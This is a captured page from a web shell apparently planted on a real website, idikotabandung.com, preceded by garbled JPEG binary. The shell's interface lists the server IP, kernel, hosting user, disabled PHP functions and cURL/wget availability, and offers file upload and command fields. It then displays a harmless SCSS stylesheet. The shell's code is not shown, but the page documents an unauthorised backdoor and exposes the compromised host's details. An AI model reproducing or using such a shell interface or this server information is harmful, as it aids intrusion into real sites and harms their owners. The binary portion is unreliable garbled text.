JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.222.222.101  /  Your IP : 216.73.216.46
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/registrasi/scss/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/registrasi/scss/_about.scss
.welcome_docmed_area{
    padding-top: 120px;
    padding-bottom: 220px;
    @media #{$mobile_device}{
        padding-bottom: 100px;
    }
    @media #{$mid_device}{
        padding-bottom: 100px;
    }
    @media #{$tablet_device}{
        padding-bottom: 100px;
    }
    .welcome_thumb{
        position: relative;
        .thumb_1{
            left: 0;
            img{
                width: 60%;
                @media #{$mobile_device} {
                    width: 100%;
                }
            }
        }
        .thumb_2{
            position: absolute;
            bottom: -94px;
            right: -37px;
            @media #{$mobile_device} {
                position: absolute;
                left: 0;
                top: 0;
                display: none;
            }
            @media #{$tablet_device} {
                position: absolute;
                right: 0;
                bottom: -40px;
            }
            img{
                width: 89%;
                @media #{$tablet_device} {
                    width: 100%;
                }
            }
        }
    }
    .welcome_docmed_info{
        padding-left: 90px;
        @media #{$mobile_device} {
            padding-left: 0;
            margin-top: 40px;
        }
        @media #{$tablet_device} {
            padding-left: 0;
            margin-top: 100px;
        }
        h2{
            font-size: 18px;
            font-weight: 400;
            color: #1F1F1F;
            margin-bottom: 40px;
            position: relative;
            z-index: 9;
            padding-bottom: 9px;
        &:before{
            content: "";
            position: absolute;
            left: 0;
            bottom: 0;
            height: 2px;
            width: 50px;
            background: #5DB2FF;
        }
            
        }
        h3{
            font-weight: 500;
            font-size: 36px;
            margin-bottom: 10px;
            @media #{$mobile_device}{
                font-size: 30px;
            }
            br{
                @media #{$mobile_device} {
                    display: none;
                }
            }
        }
        p{
            font-size: 16px;
            color: #727272;
            line-height: 28px;
        }
        ul{
            margin-bottom: 40px;
            margin-top: 25px;
            li{
                color: #727272;
                font-size: 16px;
                line-height: 28px;
                i{
                    margin-right: 10px;
                    color: #5DB2FF;
                    font-weight: 16px;
                }
            }
        }
    }
}

.business_expert_area{
    padding-bottom: 100px;
    @media #{$mobile_device} {
        padding-bottom: 50px;
    }
    .business_info{
        .icon{
            i{
                background: #5DB2FF;
                width: 75px;
                height: 75px;
                display: inline-block;
                color: #fff;
                font-size: 35px;
                text-align: center;
                line-height: 75px;
                border-radius: 50%;
            }
        }
        h3{
            font-size: 20px;
            font-weight: 500;
            color: #1F1F1F;
            margin-top: 16px;
            margin-bottom: 14px;
        }
        p{  
            color: #727272;
            line-height: 28px;
            margin-bottom: 0;
        }   
    }
    .business_thumb{
        @media #{$mobile_device}{
            padding-top: 20px;
        }
        img{
            width: 100%;
        }
    }
    .business_tabs_area{
        background: #F5FBFF;
        .nav{
            .nav-item{
                width: 33.3333333334%;
                @media #{$mobile_device} {
                    width: 100%;
                }
                a{
                    font-size: 20px;
                    font-weight: 400;
                    color: #1F1F1F;
                    padding: 35px 0px 35px 40px;
                    @media #{$mobile_device} {
                        padding: 10px;
                    }
                    @media #{$tablet_device} {
                        padding: 20px;
                        font-size: 15px;
                    }
                    &.active{
                        background: #fff;
                    }
                }   
            }
        }
        #myTab {
            display: flex;
            align-content: center;
            justify-content: space-between;
        }
    }

}
.border_bottom {
	border-bottom: 1px solid #E8E8E8;
	padding-bottom: 60px;
	padding-top: 60px;
}

Youez - 2016 - github.com/yon3zu
LinuXploit